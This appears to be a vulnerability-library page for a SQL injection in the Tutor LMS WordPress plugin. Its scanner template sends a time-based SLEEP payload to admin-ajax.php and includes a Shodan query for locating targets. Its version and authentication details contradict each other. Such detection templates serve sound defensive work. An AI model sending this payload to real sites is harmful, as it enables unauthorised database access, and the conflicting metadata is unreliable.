/Vulnerability Library

Tutor LMS <= 2.1.10 - SQL Injection

CVE-2024-1751
Verified

Description

Tutor LMS – eLearning and online course solution plugin for WordPress [all versions up to 2.6.1] contains a time-based SQL Injection caused by insufficient escaping on the question_id parameter in SQL queries, letting authenticated attackers with subscriber or higher access extract sensitive information, exploit requires attacker to be authenticated with subscriber or higher privileges.

Severity

High

CVSS Score

7.5

Exploit Probability

35%

Published Date

February 4, 2026

Template Author

shivam kamboj

CVE-2024-1751.yaml
id: CVE-2024-1751

info:
  name: Tutor LMS <= 2.1.10 - SQL Injection
  author: Shivam Kamboj
  severity: high
  description: |
    Tutor LMS – eLearning and online course solution plugin for WordPress [all versions up to 2.6.1] contains a time-based SQL Injection caused by insufficient escaping on the question_id parameter in SQL queries, letting authenticated attackers with subscriber or higher access extract sensitive information, exploit requires attacker to be authenticated with subscriber or higher privileges.
  impact: |
    Authenticated attackers can extract sensitive database information through SQL injection, potentially leading to data breach or further exploitation.
  remediation: |
    Update to version 2.6.2 or later to fix the vulnerability.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor/tutor-lms-2110-unauthenticated-sql-injection
    - https://plugins.trac.wordpress.org/changeset?old=2919134%40tutor&new=2919134%40tutor
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1751
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1751
    epss-score: 0.35249
    epss-percentile: 0.97105
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"/plugins/tutor/"
  tags: cve,cve2024,wordpress,wp-plugin,tutor,sqli,unauth,wp

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /courses/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "_tutor_nonce")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - "_tutor_nonce[\"']:\\s*[\"']([a-f0-9]+)[\"']"
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=load_filtered_instructor&_tutor_nonce={{nonce}}&current_page=1&short_by=ASC%2C%28SELECT+SLEEP%287%29%29--+-

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_any(body, "\"success\":true", "tutor-instructor-list")'
        condition: and
# digest: 4a0a00473045022002a3987829731eed1f98b64dda0c16930898b7862563a65bd73179280d1c84d9022100cd99be3226c9a07c9e6bbf1487ced13f48d5c2f31b11833a07c3fb0a1dd84b81:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2024-1751
CWE ID:
cwe-89

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor/tutor-lms-2110-unauthenticated-sql-injectionhttps://plugins.trac.wordpress.org/changeset?old=2919134%40tutor&new=2919134%40tutorhttps://nvd.nist.gov/vuln/detail/CVE-2024-1751

Remediation Steps

Update to version 2.6.2 or later to fix the vulnerability.